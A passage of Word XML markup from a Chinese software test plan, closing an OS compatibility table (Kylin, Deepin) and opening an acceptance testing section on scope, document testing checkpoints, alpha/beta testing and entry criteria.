              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="420" w:hanging="420"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="596A9004" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="637"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1572" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="623E55FF" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2496" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0C760808" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>麒麟系统</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2035" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="271EE011"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i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>True</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2035" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6686B8C0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="1A431859" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="715"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1572" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6823C35D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2496" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3F0AC5CA" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00751612" w:rsidP="00A5661A">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId125" w:tgtFrame="/Users/zwj/Documents\x/_blank" w:history="1">
              <w:r w:rsidR="00C55A9C" w:rsidRPr="003914A3">
                <w:rPr>
                  <w:rStyle w:val="af3"/>
                  <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
                  <w:color w:val="000000" w:themeColor="text1"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="18"/>
                  <w:u w:val="none"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                </w:rPr>
                <w:t>Deepin</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00C55A9C" w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>（深度）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B52ABA7" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2035" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4D8FF444" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>True</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2035" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="269AC34D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1B09CABA" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>详见：持续免疫系统测试用例表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B3047B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BBFC464" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-1"/>
      </w:pPr>
      <w:bookmarkStart w:id="444" w:name="_Toc36487995"/>
      <w:bookmarkStart w:id="445" w:name="_Toc36573263"/>
      <w:bookmarkStart w:id="446" w:name="_Toc36630349"/>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>验收测试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="444"/>
      <w:bookmarkEnd w:id="445"/>
      <w:bookmarkEnd w:id="446"/>
    </w:p>
    <w:p w14:paraId="76DE04C5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="447" w:name="_Toc36487996"/>
      <w:bookmarkStart w:id="448" w:name="_Toc36573264"/>
      <w:bookmarkStart w:id="449" w:name="_Toc36630350"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>验收测试简介</w:t>
      </w:r>
      <w:bookmarkEnd w:id="447"/>
      <w:bookmarkEnd w:id="448"/>
      <w:bookmarkEnd w:id="449"/>
    </w:p>
    <w:p w14:paraId="3E69EE9B"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验收测试即由产品开发方按照需求文档中所有内容（或按合同及其它有效约定，对方承诺实现的需求）进行开发、内测完毕，提交版本符合验收测试标准，通过验收小组进行的测试。通过验收测试判断产品质量是否符合产品需求，功能实现是否正确并可以最终上线。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F37FA9" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="450" w:name="_Toc36487997"/>
      <w:bookmarkStart w:id="451" w:name="_Toc36573265"/>
      <w:bookmarkStart w:id="452" w:name="_Toc36630351"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>验收测试目的</w:t>
      </w:r>
      <w:bookmarkEnd w:id="450"/>
      <w:bookmarkEnd w:id="451"/>
      <w:bookmarkEnd w:id="452"/>
    </w:p>
    <w:p w14:paraId="18753796"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通过验收测试判断产品质量是否符合产品需求、功能实现是否正确，性能和安全性方面是否符合发布标准，并且产品可以最终上线。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E22A04" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="453" w:name="_Toc36487998"/>
      <w:bookmarkStart w:id="454" w:name="_Toc36573266"/>
      <w:bookmarkStart w:id="455" w:name="_Toc36630352"/>
      <w:r w:rsidRPr="00536672">
        <w:t>测试人员</w:t>
      </w:r>
      <w:bookmarkEnd w:id="453"/>
      <w:bookmarkEnd w:id="454"/>
      <w:bookmarkEnd w:id="455"/>
    </w:p>
    <w:p w14:paraId="7672CD74" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>软件开发方技术、测试、运维、产品及其它业务相关人员；软件的使用方产品部、技术部、运维部及其</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>它部门</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>项目对接人员，共同完成验收测试。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D40D62D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="456" w:name="_Toc36487999"/>
      <w:bookmarkStart w:id="457" w:name="_Toc36573267"/>
      <w:bookmarkStart w:id="458" w:name="_Toc36630353"/>
      <w:r w:rsidRPr="00536672">
        <w:t>测试依据</w:t>
      </w:r>
      <w:bookmarkEnd w:id="456"/>
      <w:bookmarkEnd w:id="457"/>
      <w:bookmarkEnd w:id="458"/>
    </w:p>
    <w:p w14:paraId="2B6539B7" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>国家规范、行业标准、合同条款、用户确认的需求规格说明书、UI设计文档、测试用例等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6563F240" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:bookmarkStart w:id="459" w:name="_Toc36488000"/>
      <w:bookmarkStart w:id="460" w:name="_Toc36573268"/>
      <w:bookmarkStart w:id="461" w:name="_Toc36630354"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>验收测试范围</w:t>
      </w:r>
      <w:bookmarkEnd w:id="459"/>
      <w:bookmarkEnd w:id="460"/>
      <w:bookmarkEnd w:id="461"/>
    </w:p>
    <w:p w14:paraId="46517A1C"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界面测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC65D7D"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所有页面浏览，连接的正确、所有功能按钮及界面显示正确</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFD4BAA"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功能测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424CAEFF"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所有需求文档描述的功能实现正确</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E2383E"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lastRenderedPageBreak/>
        <w:t>性能测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B946091"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重点业务功能、性能</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>能</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>满足上线运营需求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56495D70"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安全性测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57926575"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接口和数据调用等方面符合安全性规范；没有安全性漏洞 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264B1631" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="462" w:name="_Toc36488001"/>
      <w:r w:rsidRPr="00536672">
        <w:t>界面测试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="462"/>
    </w:p>
    <w:p w14:paraId="299F23BA"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color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>下面是用户界面测试的要素：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592A6CD0"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color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>符合标准和规范：良好的用户界面应该遵守操作系统的界面标准，比如在windows系统中，出现红色叉号对话框意味着严重警告或错误。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B477990"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检查点：</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>（1）直观性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300F6BEB"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（2）一致性</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>（3）灵活性</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>（4）舒适性</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>（5）正确性</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>（6）实用性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116496B5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="463" w:name="_Toc36488002"/>
      <w:r w:rsidRPr="00536672">
        <w:t>文档测试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="463"/>
    </w:p>
    <w:p w14:paraId="5AF64B16" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>软件文档是软件的重要组成部分，文档错误也是软件缺陷。错误的解释可能会引导用户无法完成某些软件已有的功能。用户通过文档可以掌握具体的使用方法，提高了易用性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AB60B6"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测试对象：系统提交给用户的文档。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A23920"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目标：验证用户文档是正确的并且保证操作手册的过程能正确工作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77650E4B"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lastRenderedPageBreak/>
        <w:t>优点：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE25A57"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（1）有助于发现系统中的不足，并使系统更可用；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B0A8A0"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（2）减少客户支持成本。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5749D143"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检查点：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EDD4A0"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（1）确切按照文档所描述的方法使用系统；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5002DD6F"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（2）测试每个提示和建议；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F5C6F7"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（3）测试每个在线帮助的超链接；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DEAAD4"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（4）测试每条语句；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244C4A3A"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（5）检查所有的错误信息；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC86A4A"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（6）测试文档中的每个样例；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA25CD8"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（7）保证所有的索引入口有文档文本；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD09AA4"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（8）保证文档覆盖所有用户关键功能；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC96D0E"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（9）保证阅读类型不太技术话；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16698615"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（10）文档测试的缺陷也并入缺陷跟踪库。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69499EDB" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:bookmarkStart w:id="464" w:name="_Toc258175811"/>
      <w:bookmarkStart w:id="465" w:name="_Toc36488003"/>
      <w:r w:rsidRPr="00536672">
        <w:t>α，β版本测试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="464"/>
      <w:bookmarkEnd w:id="465"/>
    </w:p>
    <w:p w14:paraId="48601F7C"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ab/>
        <w:t>α测试是指软件开发公司组织内部人员模拟各类用户行对即将交付软件产品（称为α版本）进行测试，试图发现错误并修正。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA4AF6A"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color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>经过α测试调整的软件产品称为β版本。紧随其后的β测试是指软件开发公司组织各方面的典型用户在日常工作中实际使用β版本，并要求用户报告异常情况、提出批评意见。然后软件开发公司再对β版本进行改错和完善。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEA4768" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="466" w:name="_Toc36488004"/>
      <w:bookmarkStart w:id="467" w:name="_Toc36573269"/>
      <w:bookmarkStart w:id="468" w:name="_Toc36630355"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>验收测试准入条件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="466"/>
      <w:bookmarkEnd w:id="467"/>
      <w:bookmarkEnd w:id="468"/>
    </w:p>
    <w:p w14:paraId="58C228B6" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="469" w:name="_Toc36488005"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>验收测试的文档</w:t>
      </w:r>
      <w:bookmarkEnd w:id="469"/>
    </w:p>
    <w:p w14:paraId="2BA0B658"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a) 验收版本的需求文档（提交方提供）：要求需求文档与最终提交验收测试的程序完全匹配 ；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F801AD8"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b) 验收版本的测试用例（提交方提供）：要求测试案例覆盖最终版本的需求文档；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0092B840"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c) 验收版本的测试</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>报</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>告（提交方提供）：在测试报告书中说明测试总体情况，缺陷列表及修复情况；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B31252"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color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>) 验收版本的</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
